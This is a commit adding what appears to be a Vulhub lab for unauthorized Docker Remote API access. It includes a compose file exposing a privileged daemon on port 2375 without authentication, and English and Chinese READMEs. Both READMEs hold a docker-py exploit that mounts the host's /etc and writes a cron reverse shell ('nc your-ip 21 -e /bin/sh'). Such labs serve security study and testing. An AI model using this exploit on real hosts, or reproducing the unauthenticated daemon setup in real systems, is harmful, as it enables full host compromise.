first commit

docker/unauthorized-rce/Dockerfile

@@ -0,0 +1,7 @@
+FROM vulhub/docker:28.0.1
+
+LABEL maintainer="phithon <root@leavesongs.com>"
+
+COPY docker-entrypoint.sh /
+
+ENTRYPOINT [ "/docker-entrypoint.sh" ]

docker/unauthorized-rce/README.md

@@ -0,0 +1,48 @@
+# Docker Remote API Unauthorized Access Leads to Remote Code Execution
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Docker is a platform-as-a-service solution that delivers software in packages called containers. The Docker daemon (dockerd) exposes a REST API that allows remote management of Docker containers, images, and other resources.
+
+When the Docker daemon is configured to listen on a network port (typically TCP port 2375) without proper authentication mechanisms, attackers can gain unauthorized access to the Docker API. This vulnerability allows attackers to create, modify, and execute containers on the host system, potentially leading to remote code execution, data theft, and complete host system compromise.
+
+- <https://docs.docker.com/engine/security/protect-access/>
+- <https://tttang.com/archive/357/>
+
+## Environment Setup
+
+Execute the following command to start the vulnerable Docker environment:
+
+```
+docker compose build
+docker compose up -d
+```
+
+After the environment is started, the Docker daemon will listen on port 2375 without any authentication requirements.
+
+## Vulnerability Reproduction
+
+The vulnerability can be exploited using Python with the docker-py library. The attack involves creating a new container that mounts the host's /etc directory, allowing an attacker to modify critical system files. In this example, we will demonstrate the vulnerability by adding a malicious crontab entry that creates a reverse shell.
+
+First, install the required Python library:
+
+```
+pip install docker
+```
+
+Then create and run a Python script that exploits the vulnerability:
+
+```python
+import docker
+
+client = docker.DockerClient(base_url='http://your-ip:2375/')
+data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc your-ip 21 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})
+```
+
+The script creates a container that mounts the host's /etc directory and adds a reverse shell command to the root user's crontab. Within a minute, the cron daemon will execute the command, establishing a reverse shell connection to the attacker's machine.
+
+The successful exploitation can be verified by receiving the reverse shell connection:
+
+![Reverse Shell Exploitation](1.png)
+
+This vulnerability demonstrates the critical importance of properly securing Docker daemon access and implementing authentication mechanisms for remote API endpoints.

docker/unauthorized-rce/README.zh-cn.md

@@ -0,0 +1,46 @@
+# Docker Remote API 未授权访问导致远程代码执行
+
+Docker是一个提供容器化软件打包和交付的平台即服务（PaaS）解决方案。Docker守护进程（dockerd）提供了一个REST API，允许远程管理Docker容器、镜像和其他资源。
+
+当Docker守护进程被配置为监听网络端口（通常是TCP端口2375）且未启用适当的身份验证机制时，攻击者可以未经授权访问Docker API。利用此漏洞，攻击者可以在主机系统上创建、修改和执行容器，可能导致远程代码执行、数据窃取以及完全控制主机系统。
+
+- <https://docs.docker.com/engine/security/protect-access/>
+- <https://tttang.com/archive/357/>
+
+## 环境搭建
+
+执行以下命令启动存在漏洞的Docker环境：
+
+```
+docker compose build
+docker compose up -d
+```
+
+环境启动后，Docker守护进程将在2375端口上监听，且不需要任何身份验证。
+
+## 漏洞复现
+
+这个漏洞可以使用Python的docker-py库进行利用。攻击方法是创建一个新容器并挂载主机的/etc目录，这样攻击者就能修改系统关键文件。在这个示例中，我们将通过添加一个恶意的crontab条目来创建反弹shell，以演示漏洞的危害。
+
+首先，安装所需的Python库：
+
+```
+pip install docker
+```
+
+然后创建并运行以下Python脚本来利用漏洞：
+
+```python
+import docker
+
+client = docker.DockerClient(base_url='http://your-ip:2375/')
+data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc your-ip 21 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})
+```
+
+这个脚本创建了一个容器，挂载主机的/etc目录，并向root用户的crontab添加一个反弹shell命令。在一分钟内，cron守护进程将执行该命令，建立一个反弹shell连接到攻击者的机器。
+
+成功利用漏洞后，可以收到反弹shell连接：
+
+![反弹Shell利用](1.png)
+
+这个漏洞展示了正确保护Docker守护进程访问和为远程API端点实施身份验证机制的重要性。

docker/unauthorized-rce/docker-compose.yml

@@ -0,0 +1,6 @@
+services:
+ docker:
+   build: .
+   ports:
+    - "2375:2375"
+   privileged: true

docker/unauthorized-rce/docker-entrypoint.sh

@@ -0,0 +1,22 @@
+#!/bin/sh
+set -e
+
+# no arguments passed
+# or first arg is `-f` or `--some-option`
+if [ "$#" -eq 0 -o "${1#-}" != "$1" ]; then
+	# add our default arguments
+	set -- dockerd \
+		--host=unix:///var/run/docker.sock \
+		--host=tcp://0.0.0.0:2375 \
+		"$@"
+fi
+
+if [ "$1" = 'dockerd' ]; then
+	# if we're running Docker, let's pipe through dind
+	# (and we'll run dind explicitly with "sh" since its shebang is /bin/bash)
+	set -- sh "$(which dind)" "$@"
+fi
+
+# Start crond process
+crond -b -L /var/log/crond.log
+exec "$@"